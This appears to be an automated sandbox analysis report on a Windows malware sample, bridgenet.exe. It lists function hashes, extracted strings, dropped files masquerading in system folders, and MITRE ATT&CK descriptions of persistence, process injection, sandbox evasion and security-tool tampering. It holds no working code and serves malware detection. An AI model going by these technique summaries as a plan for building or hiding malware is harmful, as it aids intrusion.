Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: 21E05B38A5820ACBF700DB54C884AED7771FBD1765F108275D415873C9DE7C6684C780

Function 00007FF887EC6DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.1985883859.00007FF887EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ff887ec0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: 25432f5545ec160e2fb585a4fbd02b01c28fce9d5dd2346220c1aa32277086ec
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: 41D05E58D5C1034BFB545214C4503B927B0AFD5788F1400B5D90D932D5CE2CAC01C705

Function 00007FF887EC06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.1985883859.00007FF887EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ff887ec0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: beb4a8eb48f7c83b2f24c0728db4745c45eea8cc81b61c0e5f2956544b5c2f62
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 62C08C0CEFA80B00B404352E9C060ACB1207BC4F94FD00272C42C400C1DC0D20D58146

Function 00007FF887EC5472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.1985883859.00007FF887EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ff887ec0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00bf680b5b46a9595bdb638692398a2a5811b01696d80e01181bfe281bf84ad
Instruction ID: 7c9f94505282e8b5a90e3d0b241b2b718fc24f818e466bad1566336caf3344a6
Opcode Fuzzy Hash: f00bf680b5b46a9595bdb638692398a2a5811b01696d80e01181bfe281bf84ad
Instruction Fuzzy Hash: B2C08C00F2881A82F141625840243BF00829F80E80F804034E01DC63CACF1C290142C7

Function 00007FF887EC06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.1985883859.00007FF887EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ff887ec0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 6fd9025063d362c366700ed57eff09b0b6f1f8a590de9a623fca798dd4634ad3
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: A9B00208CF684F01A458317E5D4716D74647BC5658FD512B0D81D50185D84D15E55256

Non-executed Functions

Function 00007FF887EC09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF887EC0B3E
"s9, xrefs: 00007FF887EC0B46
c9, xrefs: 00007FF887EC0B56
!k9, xrefs: 00007FF887EC0B4E

Memory Dump Source

Source File: 0000002B.00000002.1985883859.00007FF887EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ff887ec0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: e452faaea35bf315bfd800777b1c2b9cfdea9cc8ea022bd90d884e42a078b766
Instruction ID: 0e370085439037c9bcece3272eec0cd24dcbbe92b09b333124e3aa057a23b509
Opcode Fuzzy Hash: e452faaea35bf315bfd800777b1c2b9cfdea9cc8ea022bd90d884e42a078b766
Instruction Fuzzy Hash: E9418B16A1857215F1523AFDF4022FC6B549FA13F9B8C8677E06C8A4D3ED3D608782E6

Analysis Process: bridgenet.exe.bin.exePID: 5480, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887E90E26 Relevance: 11.9, Strings: 8, Instructions: 1853COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
p[D, xrefs: 00007FF887E91988
0#L, xrefs: 00007FF887E91C3C
p[D, xrefs: 00007FF887E919AA
6B, xrefs: 00007FF887E92453
}D, xrefs: 00007FF887E91210
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$ }D$0#L$0#L$0#L$0#L$p[D$p[D
API String ID: 0-326778460
Opcode ID: 91146a4abf56f2c20797161528c00296309729a511ec0e0f598d9d2b06eff25f
Instruction ID: 1f5ce2ed3ad5d483bdc7f44c6a9f1c14e6942228da90c9246215c2e1f2979d56
Opcode Fuzzy Hash: 91146a4abf56f2c20797161528c00296309729a511ec0e0f598d9d2b06eff25f
Instruction Fuzzy Hash: 7AD25031E5895A8FEA98EB6884517BDB3E2FF94740F5441B9D00DC7296DE3CAC82C781

Function 00007FF887E914C5 Relevance: 9.8, Strings: 7, Instructions: 1064COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
8hD, xrefs: 00007FF887E91581
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
E, xrefs: 00007FF887E91540
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$ E$0#L$0#L$0#L$0#L$8hD
API String ID: 0-3979987510
Opcode ID: 6e853487b2c400fe9ea3d6ffd7a08aebdde9a7125a86866d984c2712407fa697
Instruction ID: 7ab86c1983e71d6b7fd8fbaea5a96bf64e3bb17b8ea6dd1ef0fb7bc517d1b181
Opcode Fuzzy Hash: 6e853487b2c400fe9ea3d6ffd7a08aebdde9a7125a86866d984c2712407fa697
Instruction Fuzzy Hash: B2726121E5895A8FEA98EB6884557B8B3F2FF94B40F5441B9D00DC72D6DE3CAC82C741

Function 00007FF887E91A9E Relevance: 7.5, Strings: 5, Instructions: 1296COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 9061508655fdb9f0e66718b3dc5398ff5aec0aada918c7ad45bfa012bd519b3d
Instruction ID: 24c87e9523b0858b61b4f0dbc6e7971fd8959976fcdf939316f5de796aa7626a
Opcode Fuzzy Hash: 9061508655fdb9f0e66718b3dc5398ff5aec0aada918c7ad45bfa012bd519b3d
Instruction Fuzzy Hash: DD925021E5895A9FEA98EB6884517B8B3F1FF94B40F5441B9D00DC72D6DE3CAC82CB41

Function 00007FF887E91461 Relevance: 7.3, Strings: 5, Instructions: 1014COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: d1f8daac897104b88c833077bb1a65d2c7e6ff3865c1307e4362c890636693fe
Instruction ID: 4d516d1019f3ed723466ecd6539ddbc2650cc4c04cbad499f837af648255dae8
Opcode Fuzzy Hash: d1f8daac897104b88c833077bb1a65d2c7e6ff3865c1307e4362c890636693fe
Instruction Fuzzy Hash: 08626022E5895A8FEA98EB6884557B8B3F1FF94B40F5441B9D00DC72D6DE3CAC82C741

Function 00007FF887E912AB Relevance: 7.2, Strings: 5, Instructions: 981COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: b5a3152ea43a5cfb31116d972a59bac4748a8170609b4cd9882a056ac2f32288
Instruction ID: 6e8f6da4d84ad4b48d0b503a18d9cba33282bfb45157992b0a3b324f7fe4fadc
Opcode Fuzzy Hash: b5a3152ea43a5cfb31116d972a59bac4748a8170609b4cd9882a056ac2f32288
Instruction Fuzzy Hash: 98625F32E5895A8FEA98EB6894517B8B3F1FF94B40F5441B9D00DC7296DE3CAC82C741

Function 00007FF887E91424 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 14b5bc298c832facb63387b2c6e20e17af46bce8889f03ebb1fbe12f9b761455
Instruction ID: 93e8618bced70453b8af3600ba50280bc7f9cabea6e4e9be2f4c990be4b6946f
Opcode Fuzzy Hash: 14b5bc298c832facb63387b2c6e20e17af46bce8889f03ebb1fbe12f9b761455
Instruction Fuzzy Hash: F4625032E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E913E0 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: e1d83a2e33ba2bf9d0c13bbb780a898ac5deb7d7f11442f5a7aea88b1e151f0e
Instruction ID: 4ffdea3f8db961c557ca13aecb014d0d2f95d6218671f4a0e59116b5a50a9956
Opcode Fuzzy Hash: e1d83a2e33ba2bf9d0c13bbb780a898ac5deb7d7f11442f5a7aea88b1e151f0e
Instruction Fuzzy Hash: 9C625032E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E9139C Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: e8b55babe60be6ea6573c5397fa5a463061ea9c986384e026bb2a236533ec4df
Instruction ID: b0bcd24a27d6e129bcb611f115a0b7c6471391af090c7b65ddd5b12cbd452cf7
Opcode Fuzzy Hash: e8b55babe60be6ea6573c5397fa5a463061ea9c986384e026bb2a236533ec4df
Instruction Fuzzy Hash: E7625031E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E91358 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: f33900be97f322e3ef726cf4b635f20b5b259865a809ca29a124908677600199
Instruction ID: 4ef7eab78777de69b44962e0f93af9c5fd347e7efbc4046d3e74060d42528ee9
Opcode Fuzzy Hash: f33900be97f322e3ef726cf4b635f20b5b259865a809ca29a124908677600199
Instruction Fuzzy Hash: 4B625032E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E91314 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 8974d6d0f5dba5e94ae642693563aa352aa83455f9daddaa4b456111eb0b9c89
Instruction ID: d6c35b68fe15db1ff695306a94eec665b498472ae470d04a94d8836140995f33
Opcode Fuzzy Hash: 8974d6d0f5dba5e94ae642693563aa352aa83455f9daddaa4b456111eb0b9c89
Instruction Fuzzy Hash: C0625032E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E912D0 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887E924B5
0#L, xrefs: 00007FF887E91C3C
6B, xrefs: 00007FF887E92453
0#L, xrefs: 00007FF887E91C11
0#L, xrefs: 00007FF887E92487

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: c8f76fcb3cdde8dbaa76a0d4f848a1957edb0abb98a3a7c3ca15ec1ecd415d0d
Instruction ID: a75429ae346bb32cb1912085040b410f02327505d3e78c5b567947ab3ef84acc
Opcode Fuzzy Hash: c8f76fcb3cdde8dbaa76a0d4f848a1957edb0abb98a3a7c3ca15ec1ecd415d0d
Instruction Fuzzy Hash: BB625032E5895A8FEA98EB6894557B8B3F1FF94B40F5441B9D00DC7286CE3CAC82C741

Function 00007FF887E99B1C Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

cN_H, xrefs: 00007FF887E9C172

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: cN_H
API String ID: 0-938979074
Opcode ID: eb127aa2bf18a1a5eaba12b6b970948af151ba9c7d1844531d93f287fba627f7
Instruction ID: ccb23dcfb16dfb2fa397c34bf102b7d69b1dd5032b542606b6b15272e4c10c52
Opcode Fuzzy Hash: eb127aa2bf18a1a5eaba12b6b970948af151ba9c7d1844531d93f287fba627f7
Instruction Fuzzy Hash: F5117C22E4890A4BFB94EB2884543BD22B2FF98B90F944575D41DC72E6DD3CAC01C780

Function 00007FF887E942C6 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e863d858c160a9b9082a491975477b3a3951041bb18905d92dbcbc05d1bc527b
Instruction ID: 625f03fa479247ad946fd5bc7b0af6183d1bdb0c492067eafd6a96842298763b
Opcode Fuzzy Hash: e863d858c160a9b9082a491975477b3a3951041bb18905d92dbcbc05d1bc527b
Instruction Fuzzy Hash: 4E016D31E5450A8AFB589BC8C9643FEB7B0FF41B51F104A3AC01A9A6D8DF7C6981C780

Function 00007FF887E93EF0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FF887E9BFFF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514c424cd3f80f1190a02d02fe19af8bea2e9e4912bb6752f6889fd06dae8d7d
Instruction ID: 8a84e4ac1ea8960b3dbf0aa5511941f1287bbaac41be6883d7cdcd47a2d69836
Opcode Fuzzy Hash: 514c424cd3f80f1190a02d02fe19af8bea2e9e4912bb6752f6889fd06dae8d7d
Instruction Fuzzy Hash: 98E04635C08219CFE770DA84D8443AD66B1BB05740F1001F6C84D932D5CB3CAD80CF11

Function 00007FF887E98729 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2032849819.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b781c7360e9265fa97addff91ba7bc8f33eece16fb5fedf88000890d13fe3e6e
Instruction ID: 51999f5cacb8929660838a4eed1163fb8d03f80a366e847f36a52c0f72942c27
Opcode Fuzzy Hash: b781c7360e9265fa97addff91ba7bc8f33eece16fb5fedf88000890d13fe3e6e
Instruction Fuzzy Hash: C7D0C930D0451C8ED760EA94C84079976B1BB04301F5041F6C40DD3286CB39AD40CF60

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Queries volume information: C:\Program Files\Internet Explorer\images\dwm.exe VolumeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Queries volume information: C:\Program Files\Internet Explorer\images\dwm.exe VolumeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Queries volume information: C:\Program Files\Internet Explorer\images\dwm.exe VolumeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Queries volume information: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe VolumeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\bridgenet.exe.bin.exe VolumeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Queries volume information: C:\Program Files\Internet Explorer\images\dwm.exe VolumeInformation

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

